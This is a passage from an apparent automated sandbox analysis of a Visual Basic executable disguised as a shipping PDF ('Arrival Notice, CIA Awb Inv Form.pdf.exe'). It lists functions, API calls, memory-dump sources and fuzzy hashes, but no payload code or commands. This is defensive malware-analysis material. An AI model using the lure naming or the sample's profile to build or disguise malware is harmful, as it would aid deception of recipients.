__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,000001EC), ref: 0041F5B3
__vbaFreeObj.MSVBVM60 ref: 0041F5BC

Strings

Badass3, xrefs: 0041F585

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: Badass3
API String ID: 1645334062-2400041744
Opcode ID: 3ab6717af0607a03af4cf727ca8abef43e240294a5fee80cefb9ba222cc2f61a
Instruction ID: 70b1e41bce938b90e2f261df8772c834ee2046e30f5ded5721f854294bb3f344
Opcode Fuzzy Hash: 3ab6717af0607a03af4cf727ca8abef43e240294a5fee80cefb9ba222cc2f61a
Instruction Fuzzy Hash: D1319FB0A40309ABC714DF69DD89F9ABBB8FF18700F108529E515E7391E7789842CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00429200, Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0042924D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042926C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C3FC,000000C8), ref: 004292AB
__vbaFreeObj.MSVBVM60 ref: 004292B4
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 004292CD
__vbaObjSet.MSVBVM60(?,00000000), ref: 004292E6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,00000204), ref: 00429369
__vbaFreeObj.MSVBVM60 ref: 00429372

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID:
API String ID: 1645334062-0
Opcode ID: 1ae6717b4359f693bf7288795a4bcaa8e9981e46e0b2e6f232fd28e0f0236f3f
Instruction ID: 5baa1043d334e56103f527f32974d8bbe12837cd9480d26d1b068978ffa16f0d
Opcode Fuzzy Hash: 1ae6717b4359f693bf7288795a4bcaa8e9981e46e0b2e6f232fd28e0f0236f3f
Instruction Fuzzy Hash: 5F411AB4A40214ABCB14DF68D989B9ABBF4EB49700F14C569E909EB391D7349841CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004200D0, Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0041CAC0,0042B010,?,?,?,?,?,?,?,?,?,?,?,?,?,00401346), ref: 00420123
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401346), ref: 00420142
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,000001FC), ref: 00420181
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401346), ref: 00420190
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 004201A5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004201BE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,000000E0), ref: 004201E1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401346), ref: 004201F0

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID:
API String ID: 1645334062-0
Opcode ID: d2ee1ddf179d6b8ee3ef74aa69284257205790941af2274de96c8eacdc4c28ef
Instruction ID: 614b6244230a34d6ec55f8388e52f56b13fabc30f73c9528b18b65488e25d052
Opcode Fuzzy Hash: d2ee1ddf179d6b8ee3ef74aa69284257205790941af2274de96c8eacdc4c28ef
Instruction Fuzzy Hash: F6316F74A40318ABCB15DFA8DD89FAABBF8FF08700F10856AF541E7351D77898418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00420DF0, Relevance: 12.1, APIs: 8, Instructions: 75COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00420E33
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00420E52
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C328,00000218), ref: 00420E71
__vbaFreeObj.MSVBVM60 ref: 00420E80
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00420E95
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00420EAE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4BC,000001C0), ref: 00420ECD
__vbaFreeObj.MSVBVM60 ref: 00420ED6

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID:
API String ID: 1645334062-0
Opcode ID: 3bde3afa0ddcb207336f163c69716cf72c419de81583c8e4301706cf5d15b15b
Instruction ID: b377f76b0c7ee03cd9d0f007185ff0e177010ad872b081f33ca0d0925bd46087
Opcode Fuzzy Hash: 3bde3afa0ddcb207336f163c69716cf72c419de81583c8e4301706cf5d15b15b
Instruction Fuzzy Hash: 57219070780218AFD711EF64DD89FAB77E8EF18701F500865F841F72A1D778A9418AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00428FB0, Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00428FFF
__vbaOnError.MSVBVM60(00000000), ref: 00429006
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0042901F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429038
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C40C,000001B4), ref: 004290BF
__vbaFreeObj.MSVBVM60 ref: 004290C8
__vbaFreeStr.MSVBVM60(004290EA), ref: 004290E3

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckCopyErrorHresultNew2
String ID:
API String ID: 3491321472-0
Opcode ID: 96477fc00a958c7d78dd9a998b428fe8a43b08d23a1112b460b8e775fb5ebabd
Instruction ID: ca2b48f9e0d9b1b6ea7d5ee35ecfdd2dbb7030999c882f28ead3c5a2e823b51c
Opcode Fuzzy Hash: 96477fc00a958c7d78dd9a998b428fe8a43b08d23a1112b460b8e775fb5ebabd
Instruction Fuzzy Hash: 3541D9B4E10218AFCB04DFA8D989A9EBBF4FF49700F14C16AE815A7351D7749902CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00429110, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00429153
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0042916C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C338,000001EC), ref: 004291B4
__vbaFreeObj.MSVBVM60 ref: 004291BD

Strings

perimeters, xrefs: 00429183

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: perimeters
API String ID: 1645334062-1754290069
Opcode ID: 11f83ca443122cb2636b5c52aa2ab0496517a6bd211949e7d2cd7dec634daf37
Instruction ID: a56c3f86c6a81bf6b9c5abc5d9ef58ab4d19b2f4e01c022668475e9f8af8efac
Opcode Fuzzy Hash: 11f83ca443122cb2636b5c52aa2ab0496517a6bd211949e7d2cd7dec634daf37
Instruction Fuzzy Hash: 3C1181B0A4030AABD700DF69DD89BABBBB8FB18700F108429F905E3390D77859418BD8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Arrival Notice, CIA Awb Inv Form.pdf.exe PID: 7132 Parent PID: 4636 Arrival Notice, CIA Awb Inv Form.pdf.exeCOMMON

Executed Functions

Function 1EA32EB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32EBA

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c49c7915647c6b0df1e6ddeac6c215c6a7c685c55561fb7be4a9d701d6b96094
Instruction ID: 29f7d7e469c8596afe8021b23a94d76ada0931d07b35284640730d4fac5bcb22
Opcode Fuzzy Hash: c49c7915647c6b0df1e6ddeac6c215c6a7c685c55561fb7be4a9d701d6b96094
Instruction Fuzzy Hash: 4290023120180402D7007959591470F40054BD0742FA5C515B1154515DC6358851B575

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32ED0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32EDA

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78828ae6a1d8789c0f060777913d1a79ea0c8c626c2b285d45aac2e7d22ecb38
Instruction ID: cedf93eec609c591f44a128a3bb540690fd183562201ae5d7805d48953be5f03
Opcode Fuzzy Hash: 78828ae6a1d8789c0f060777913d1a79ea0c8c626c2b285d45aac2e7d22ecb38
Instruction Fuzzy Hash: DE9002216014004247407969994490A80056FE16517A5C625B0988510DC5698865A669

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32E5A

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33003228e758fb766452153ebc07e8fe893707666de627feb3713d7ec4fe3e09
Instruction ID: 20ea208b4922c963df8825c230dab1c944f306d888ef0d4d43328464797d67c0
Opcode Fuzzy Hash: 33003228e758fb766452153ebc07e8fe893707666de627feb3713d7ec4fe3e09
Instruction Fuzzy Hash: 6990026134140442D70079595514B0A40058BE1741FA5C519F1054514DC629CC52B12A

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32F0A

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8723f47734f906bfdcee81b25752d70be8cd286f8bebc4ff25db6306f075e759
Instruction ID: ddb21bcf94d74465192bbd80ac0783971779485cf48666121becf864223415fc
Opcode Fuzzy Hash: 8723f47734f906bfdcee81b25752d70be8cd286f8bebc4ff25db6306f075e759
Instruction Fuzzy Hash: FA900221211C0042D7007D695D14B0B40054BD0743FA5C619B0144514CC9258861A525

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32CFA

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b42a7c99b03d5d5123ec4a3daffb08b013e62f368166cb7d2ec1be97d6bbc608
Instruction ID: d3d6c9522bfca705264c2219ad10feab9f6640b4514e6a298f81207330cbfcb7
Opcode Fuzzy Hash: b42a7c99b03d5d5123ec4a3daffb08b013e62f368166cb7d2ec1be97d6bbc608
Instruction Fuzzy Hash: 8E900221242441525B45B959550450B80065BE06817E5C516B1404910CC5369856E625

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32C3A

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 598f6143b88c9a74a120eeef7faf1013b87b535d9ca1702dc9193aadc275d552
Instruction ID: 6a46437bc2a7acf7a565c6770623b904eee59866fc9cbe822702f5d85d26d8d1
Opcode Fuzzy Hash: 598f6143b88c9a74a120eeef7faf1013b87b535d9ca1702dc9193aadc275d552
Instruction Fuzzy Hash: 7190022921340002D7807959650860E40054BD1642FE5D919B0005518CC9258869A325

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32C50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32C5A

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e38a83ae412c5e1bcb17e326198c0e206ccccd9a24158922396986516e1b8bb
Instruction ID: 378e056ca6c6925df81e9d0746ba166f0ddaf71f6de8ced6bfed048b22ab646d
Opcode Fuzzy Hash: 6e38a83ae412c5e1bcb17e326198c0e206ccccd9a24158922396986516e1b8bb
Instruction Fuzzy Hash: BD90022130140003D7407959651860A80059BE1741FA5D515F0404514CD9258856A226

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32DA0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32DAA

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc5dd0f0eb49185e27aeafca4958992800c4aea97764268cfe4aff551052f1b0
Instruction ID: 8c165c80de700d8e9ecbfe8cc1b34f3435536b377fac121577eadcd933693e5d
Opcode Fuzzy Hash: cc5dd0f0eb49185e27aeafca4958992800c4aea97764268cfe4aff551052f1b0
Instruction Fuzzy Hash: 7290022160140502D7017959550461A400A4BD0681FE5C526B1014515ECA358992F135

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32DCA

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f88a15a8b549e602bf36b54097d62ed37fa2be16488972c08f21721efb5d0571
Instruction ID: d1a63a4ca8cf21e01ce5e6a3a8e63db0b62585849bbdf859f1ae7fa51080ded6
Opcode Fuzzy Hash: f88a15a8b549e602bf36b54097d62ed37fa2be16488972c08f21721efb5d0571
Instruction Fuzzy Hash: D790027120140402D7407959550474A40054BD0741FA5C515B5054514EC6698DD5B669

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32D1A

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae4be738cd3910a03fd95d03a8d03b3098d20d1968e45910eb81049c5d823e69
Instruction ID: 6528c96b80e366bfd9460b71e1072a89105fc5dd7af34d20e511e39d3bb6d870
Opcode Fuzzy Hash: ae4be738cd3910a03fd95d03a8d03b3098d20d1968e45910eb81049c5d823e69
Instruction Fuzzy Hash: 1990023120140413D7117959560470B40094BD0681FE5C916B0414518DD6668952F125

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32B9A

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a360d96f21b57994ded62af8644020a818903be43403c30f0a8b1111d2b2eaea
Instruction ID: cf46642fe4777423fd7aafb97d7665a467a0ac5905cedfa9f18c9101c3727479
Opcode Fuzzy Hash: a360d96f21b57994ded62af8644020a818903be43403c30f0a8b1111d2b2eaea
Instruction Fuzzy Hash: FF90023120148802D7107959950474E40054BD0741FA9C915B4414618DC6A58891B125

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32BCA

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59490b889d31e6833a3f0f412c372424007ac49f18658aa3c49296a51894370a
Instruction ID: dbe6af2c84a0fbb0008b3f3ce26db018a802d800921feea02f0522f6af9dc5ee
Opcode Fuzzy Hash: 59490b889d31e6833a3f0f412c372424007ac49f18658aa3c49296a51894370a
Instruction Fuzzy Hash: F290023120140402D7007D99650864A40054BE0741FA5D515B5014515EC6758891B135

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32B1A

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2d11c3e9e27534957cdbfa3c8425ddfaa63912303f84e06a875a8c8c7824ab7d
Instruction ID: 5ea7dda7bf9e6200b6e0e02bb769a152c47f659473f90a78cc525dfaedd269ee
Opcode Fuzzy Hash: 2d11c3e9e27534957cdbfa3c8425ddfaa63912303f84e06a875a8c8c7824ab7d
Instruction Fuzzy Hash: 8D90023120140802D7807959550464E40054BD1741FE5C519B0015614DCA258A59B7A5

Uniqueness

Uniqueness Score: -1.00%

Function 1EA329F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA329FA

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cfe1ee6f606539112d49844b33621e3ea7cc0b52e3be599d7c3a72c2ec0a735a
Instruction ID: 2b40aa435b6222ff3a1633742722c5e0d48c0933949a3df1825181c2bb1353f2
Opcode Fuzzy Hash: cfe1ee6f606539112d49844b33621e3ea7cc0b52e3be599d7c3a72c2ec0a735a
Instruction Fuzzy Hash: 86900225211400030705BD59170450B40464BD57913A5C525F1005510CD6318861A125

Uniqueness

Uniqueness Score: -1.00%

Function 00573993, Relevance: 1.7, APIs: 1, Instructions: 191threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-5CAC1AFC), ref: 00573A5D

Memory Dump Source

Source File: 00000006.00000002.22816220764.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 852f84c8193c0b2b8630548f9d15015387e21dac729de64d54644712c2b6985c
Instruction ID: 3f7b0eca8940dc6522b62e0b8a7359e89b159568156481041d52f8c34ea9acb8
Opcode Fuzzy Hash: 852f84c8193c0b2b8630548f9d15015387e21dac729de64d54644712c2b6985c
Instruction Fuzzy Hash: 235138316103268EDB218E7894D97D2BFA2BF61360F85C6A9CCC99B446D3319EC9F701

Uniqueness

Uniqueness Score: -1.00%

Function 00573966, Relevance: 1.7, APIs: 1, Instructions: 152threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-5CAC1AFC), ref: 00573A5D

Memory Dump Source

Source File: 00000006.00000002.22816220764.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 657a90cfbac632ecc11b7b3de68a01afc8319a992fd7c713220efcb7659305ee
Instruction ID: 447d5a5274a2998b3d0d6ba198feccce75eeb683d74c41749863f30c5f0698cb
Opcode Fuzzy Hash: 657a90cfbac632ecc11b7b3de68a01afc8319a992fd7c713220efcb7659305ee
Instruction Fuzzy Hash: 40413B346043268FDB214E2495D57E27BA6BF12330F99C56ACC899B156C3318EC8F702

Uniqueness

Uniqueness Score: -1.00%

Function 00573A0E, Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-5CAC1AFC), ref: 00573A5D

Memory Dump Source

Source File: 00000006.00000002.22816220764.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 7b6ba9d338f394045a228d37bd1874d0c951ebba567df8a13065d194fefa9fa5
Instruction ID: 87ac32b48106e8ee52968303d483814213e19cc3837d59b1d3b14b901dca93f9
Opcode Fuzzy Hash: 7b6ba9d338f394045a228d37bd1874d0c951ebba567df8a13065d194fefa9fa5
Instruction Fuzzy Hash: 6B31F9316102278EEB228A74D4D87E27FA7BF21334F98C295C8899B156D7318EC9F701

Uniqueness

Uniqueness Score: -1.00%

Function 1EA32B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EA32B44

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2570467057a79bc12d0765746316a09c94fa6705002ec3fe5efd476d5683f7e4
Instruction ID: 18ef1af86ee5b66950ad55bbcb9853c89887fa815b40a290894ea05da423a84c
Opcode Fuzzy Hash: 2570467057a79bc12d0765746316a09c94fa6705002ec3fe5efd476d5683f7e4
Instruction Fuzzy Hash: F3B09B719014C5C5D711EF60570870B79056BD0B41F75C555F2460641E4738C491F179

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1EA9FDF4, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA9FE28

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1EAA026A
Just reallocated block at %p to %Ix bytes, xrefs: 1EAA0171
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 1EAA0053
HEAP: , xrefs: 1EA9FF26, 1EAA0035, 1EAA015D, 1EAA0202, 1EAA0259
About to reallocate block at %p to %Ix bytes, xrefs: 1EA9FF3A
RtlReAllocateHeap, xrefs: 1EA9FE3F, 1EA9FEE2
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 1EAA021F
HEAP[%wZ]: , xrefs: 1EA9FF19, 1EAA0028, 1EAA0150, 1EAA01F5, 1EAA024C

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 5bb7f2c7eed1b9034766ca1e6b6554d20e58dcd34ba6423290f62e3205e3a3a6
Instruction ID: 24b0c523542aea7bf51c8e34e3fd10a2c8acb2ba428e1438a0ca175346357789
Opcode Fuzzy Hash: 5bb7f2c7eed1b9034766ca1e6b6554d20e58dcd34ba6423290f62e3205e3a3a6
Instruction Fuzzy Hash: 21D10F39900785DFCB02CFA8C490AAABBF2FF89314F05865DE645AB612D735A941CB58

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1DA20, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA5F41B

Strings

, passed to %s, xrefs: 1EA5F46C
HEAP: , xrefs: 1EA5F451
Invalid heap signature for heap at %p, xrefs: 1EA5F45D
HEAP[%wZ]: , xrefs: 1EA5F444
RtlUnlockHeap, xrefs: 1EA5F467

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
